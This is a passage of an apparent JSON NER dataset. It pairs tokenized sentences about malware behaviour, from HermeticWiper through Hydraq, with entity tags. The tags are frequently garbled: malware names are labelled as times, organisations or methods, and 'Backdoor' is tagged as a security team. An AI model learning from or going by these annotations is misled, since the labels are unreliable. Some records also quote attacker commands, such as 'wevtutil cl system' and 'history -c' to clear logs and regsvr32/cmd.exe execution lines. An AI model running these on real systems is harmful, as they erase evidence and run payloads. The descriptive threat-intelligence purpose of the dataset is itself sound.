"O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "call", "multiple", "Windows", "API", "functions", "used", "for", "privilege", "escalation,", "service", "execution,", "and", "to", "overwrite", "random", "bites", "of", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "I-Features", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "use", "scheduled", "tasks", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "create", "system", "services", "to", "aid", "in", "executing", "the", "payload." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "stop", "the", "Volume", "Shadow", "Copy", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "determine", "the", "OS", "version,", "bitness,", "and", "enumerate", "physical", "drives", "on", "a", "targeted", "host." ], "ner_tags": [ "B-Time", "O", "B-Features", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "initiate", "a", "system", "shutdown." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "has", "the", "ability", "to", "receive", "a", "command", "parameter", "to", "sleep", "prior", "to", "carrying", "out", "destructive", "actions", "on", "a", "targeted", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "use", "`cmd.exe", "/Q/c", "move", "CSIDL_SYSTEM_DRIVE\\temp\\sys.tmp1", "CSIDL_WINDOWS\\policydefinitions\\postgresql.exe", "1>", "\\\\127.0.0.1\\ADMIN$\\_1636727589.6007507", "2>&1`", "to", "deploy", "on", "an", "infected", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWiper", "can", "load", "drivers", "by", "creating", "a", "new", "service", "using", "the", "`CreateServiceW`", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "has", "the", "ability", "to", "use", "`wevtutil", "cl", "system`", "to", "clear", "event", "logs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "HermeticWizard", "has", "been", "signed", "by", "valid", "certificates", "assigned", "to", "Hermetica", "Digital." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "execute", "files", "on", "remote", "machines", "using", "DCOM." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "HermeticWizard", "has", "the", "ability", "to", "encrypt", "PE", "files", "with", "a", "reverse", "XOR", "loop." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "copy", "files", "to", "other", "machines", "on", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "has", "been", "named", "`exec_32.dll`", "to", "mimic", "a", "legitimate", "MS", "Outlook", ".dll." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SecTeam", "B-SecTeam" ] }, { "tokens": [ "HermeticWizard", "can", "connect", "to", "remote", "shares", "using", "`WNetAddConnection2W`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "HermeticWizard", "has", "the", "ability", "to", "scan", "ports", "on", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "use", "a", "list", "of", "hardcoded", "credentials", "in", "attempt", "to", "authenticate", "to", "SMB", "shares." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "HermeticWizard", "has", "used", "`regsvr32.exe", "/s", "/i`", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "find", "machines", "on", "the", "local", "network", "by", "gathering", "known", "local", "IP", "addresses", "through", "`DNSGetCacheDataTable`,", "`GetIpNetTable`,`WNetOpenEnumW(RESOURCE_GLOBALNET,", "RESOURCETYPE_ANY)`,`NetServerEnum`,`GetTcpTable`,", "and", "`GetAdaptersAddresses.`" ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SamFile", "B-SamFile", "O", "B-Way" ] }, { "tokens": [ "HermeticWizard", "has", "the", "ability", "to", "create", "a", "new", "process", "using", "`rundll32`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "use", "a", "list", "of", "hardcoded", "credentials", "to", "to", "authenticate", "via", "NTLMSSP", "to", "the", "SMB", "shares", "on", "remote", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "use", "`OpenRemoteServiceManager`", "to", "create", "a", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "use", "`cmd.exe`", "for", "execution", "on", "compromised", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HermeticWizard", "can", "use", "WMI", "to", "create", "a", "new", "process", "on", "a", "remote", "machine", "via", "`C:\\windows\\system32\\cmd.exe", "/c", "start", "C:\\windows\\system32\\\\regsvr32.exe", "/s", "/iC:\\windows\\<filename>.dll`." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "use", "DNS", "tunneling", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "decrypt", "its", "payload", "prior", "to", "execution." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "inject", "a", "DLL", "into", "rundll32.exe", "for", "execution." ], "ner_tags": [ "B-HackOrg", "B-SecTeam", "O", "B-Features", "I-Features", "B-Way", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "encrypt", "its", "payload." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "has", "the", "ability", "to", "delete", "folders", "and", "files", "from", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "has", "the", "ability", "to", "search", "the", "compromised", "host", "for", "files." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "B-Features", "I-Purp", "I-Purp", "I-Purp", "B-Features", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "has", "been", "spread", "through", "malicious", "document", "lures." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Tool", "B-Way" ] }, { "tokens": [ "Heyoka", "Backdoor", "has", "been", "named", "`srvdll.dll`", "to", "appear", "as", "a", "legitimate", "service." ], "ner_tags": [ "B-HackOrg", "B-SecTeam", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "identify", "removable", "media", "attached", "to", "victim's", "machines." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "gather", "process", "information." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "use", "spoofed", "DNS", "requests", "to", "create", "a", "bidirectional", "tunnel", "between", "a", "compromised", "host", "and", "its", "C2", "servers." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "establish", "persistence", "with", "the", "auto", "start", "function", "including", "using", "the", "value", "`EverNoteTrayUService`." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "use", "rundll32.exe", "to", "gain", "execution." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "enumerate", "drives", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Heyoka", "Backdoor", "can", "check", "if", "it", "is", "running", "as", "a", "service", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "encrypts", "C2", "traffic", "with", "TLS." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "uses", "various", "XOR", "techniques", "to", "obfuscate", "its", "components." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "deletes", "its", "RAT", "installer", "file", "as", "it", "executes", "its", "DLL", "payload", "file." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "has", "the", "ability", "to", "upload", "and", "download", "files", "from", "its", "C2", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "creates", "a", "Registry", "Run", "key", "to", "establish", "persistence." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "executes", "using", "regsvr32.exe", "called", "from", "the", "Registry", "Run", "Keys", "/", "Startup", "Folder", "persistence", "mechanism." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hi-Zor", "encrypts", "C2", "traffic", "with", "a", "double", "XOR", "using", "two", "distinct", "single-byte", "keys." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Hi-Zor", "communicates", "with", "its", "C2", "server", "over", "HTTPS." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-HackOrg", "O", "O", "B-Way" ] }, { "tokens": [ "Hi-Zor", "has", "the", "ability", "to", "create", "a", "reverse", "shell." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "uses", "a", "cipher", "to", "implement", "a", "decoding", "function." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "adds", "itself", "as", "a", "shared", "object", "to", "the", "LD_PRELOAD", "environment", "variable." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "HiddenWasp", "encrypts", "its", "configuration", "and", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "downloads", "a", "tar", "compressed", "archive", "from", "a", "download", "server", "to", "the", "system." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "creates", "a", "user", "account", "as", "a", "means", "to", "provide", "initial", "persistence", "to", "the", "compromised", "machine." ], "ner_tags": [ "B-Idus", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "communicates", "with", "a", "simple", "network", "protocol", "over", "TCP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "HiddenWasp", "installs", "reboot", "persistence", "by", "adding", "itself", "to", "<code>/etc/rc.local</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "uses", "a", "rootkit", "to", "hook", "and", "implement", "functions", "on", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "uses", "an", "RC4-like", "algorithm", "with", "an", "already", "computed", "PRGA", "generated", "key-stream", "for", "network", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HiddenWasp", "uses", "a", "script", "to", "automate", "tasks", "on", "the", "victim's", "machine", "and", "to", "assist", "in", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "has", "attempted", "to", "disable", "driver", "signing", "verification", "by", "tampering", "with", "several", "Registry", "keys", "prior", "to", "the", "loading", "of", "a", "rootkit", "driver", "component." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Hikit", "has", "used", "DLL", "Search", "Order", "Hijacking", "to", "load", "<code>oci.dll</code>", "as", "a", "persistence", "mechanism." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "I-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "can", "upload", "files", "from", "compromised", "machines." ], "ner_tags": [ "B-Way", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "has", "the", "ability", "to", "download", "files", "to", "a", "compromised", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "installs", "a", "self-generated", "certificate", "to", "the", "local", "trust", "store", "as", "a", "root", "CA", "and", "Trusted", "Publisher." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "supports", "peer", "connections." ], "ner_tags": [ "B-Way", "O", "O", "B-Features" ] }, { "tokens": [ "Hikit", "has", "been", "spread", "through", "spear", "phishing." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "Hikit", "is", "a", "Rootkit", "that", "has", "been", "used", "by", "Axiom." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hikit", "performs", "XOR", "encryption." ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "Hikit", "has", "used", "HTTP", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Hikit", "has", "the", "ability", "to", "create", "a", "remote", "shell", "and", "run", "given", "commands." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "an", "IRC", "channel", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "history", "-c", "to", "clear", "script", "shell", "logs." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "queried", "the", "Cloud", "Instance", "Metadata", "API", "for", "cloud", "credentials." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "was", "executed", "through", "the", "kubelet", "API", "run", "command", "and", "by", "executing", "commands", "on", "running", "containers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "masscan", "to", "search", "for", "kubelets", "and", "the", "kubelet", "API", "for", "additional", "running", "containers." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "searched", "for", "SSH", "keys,", "Docker", "credentials,", "and", "Kubernetes", "service", "tokens." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Way", "B-Tool", "B-Tool", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "Hildegard", "has", "decrypted", "ELF", "files", "with", "AES." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Hildegard", "has", "modified", "DNS", "resolvers", "to", "evade", "DNS", "monitoring", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "modified", "/etc/ld.so.preload", "to", "intercept", "shared", "library", "import", "functions." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "encrypted", "an", "ELF", "file." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "the", "BOtB", "tool", "that", "can", "break", "out", "of", "containers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "the", "BOtB", "tool", "which", "exploits", "CVE-2019-5736." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "B-Features" ] }, { "tokens": [ "Hildegard", "was", "executed", "through", "an", "unsecure", "kubelet", "that", "allowed", "anonymous", "access", "to", "the", "victim", "environment." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "deleted", "scripts", "after", "execution." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "downloaded", "additional", "scripts", "that", "build", "and", "run", "Monero", "cryptocurrency", "miners." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O" ] }, { "tokens": [ "Hildegard", "has", "created", "a", "user", "named", "“monerodaemon”." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Hildegard", "has", "disguised", "itself", "as", "a", "known", "Linux", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "masscan", "to", "look", "for", "kubelets", "in", "the", "internal", "Kubernetes", "network." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "searched", "for", "private", "keys", "in", ".ssh." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "established", "tmate", "sessions", "for", "C2", "communications." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "xmrig", "to", "mine", "cryptocurrency." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "Hildegard", "has", "modified", "/etc/ld.so.preload", "to", "overwrite", "readdir()", "and", "readdir64()." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "packed", "ELF", "files", "into", "other", "binaries." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "collected", "the", "host's", "OS,", "CPU,", "and", "memory", "information." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "started", "a", "monero", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "used", "shell", "scripts", "for", "execution." ], "ner_tags": [ "B-Time", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "Hildegard", "has", "downloaded", "scripts", "from", "GitHub." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "list", "the", "names", "of", "all", "open", "windows", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "encrypted", "strings", "with", "single-byte", "XOR", "and", "base64", "encoded", "RC4." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "download", "files", "from", "the", "infected", "host", "to", "the", "command", "and", "control", "(C2)", "server." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "clean", "up", "installed", "files,", "delete", "files,", "and", "delete", "itself", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "B-Features", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "retrieve", "a", "list", "of", "files", "in", "a", "given", "directory", "as", "well", "as", "drives", "and", "drive", "types." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "hide", "the", "window", "for", "operations", "performed", "on", "a", "given", "file." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "upload", "a", "file", "from", "the", "command", "and", "control", "(C2)", "server", "to", "the", "victim", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "can", "perform", "dynamic", "DLL", "importing", "and", "API", "lookups", "using", "<code>LoadLibrary</code>", "and", "<code>GetProcAddress</code>", "on", "obfuscated", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "list", "running", "processes", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "attempted", "to", "install", "a", "scheduled", "task", "named", "“Java", "Maintenance64”", "on", "startup", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "do", "real", "time", "screen", "viewing", "on", "an", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "stop", "services", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "can", "retrieve", "a", "list", "of", "applications", "from", "the", "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App", "Paths</code>", "registry", "key." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "used", "the", "open", "source", "UPX", "executable", "packer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "HotCroissant", "has", "compressed", "network", "communications", "and", "encrypted", "them", "with", "a", "custom", "stream", "cipher." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "determine", "if", "the", "current", "user", "is", "an", "administrator,", "Windows", "product", "name,", "processor", "name,", "screen", "resolution,", "and", "physical", "RAM", "of", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "identify", "the", "IP", "address", "of", "the", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "collect", "the", "username", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "has", "the", "ability", "to", "retrieve", "a", "list", "of", "services", "on", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "HotCroissant", "can", "remotely", "open", "applications", "on", "the", "infected", "host", "with", "the", "<code>ShellExecuteA</code>", "command." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "adjust", "token", "privileges." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Purp", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "clear", "all", "system", "event", "logs." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "read", "data", "from", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "connects", "to", "a", "predefined", "domain", "on", "port", "443", "to", "exfil", "gathered", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "delete", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "check", "for", "the", "existence", "of", "files,", "including", "its", "own", "components,", "as", "well", "as", "retrieve", "a", "list", "of", "logical", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Hydraq", "creates", "a", "backdoor", "through", "which", "remote", "attackers", "can", "download", "files", "and", "additional", "malware", "components." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "O", 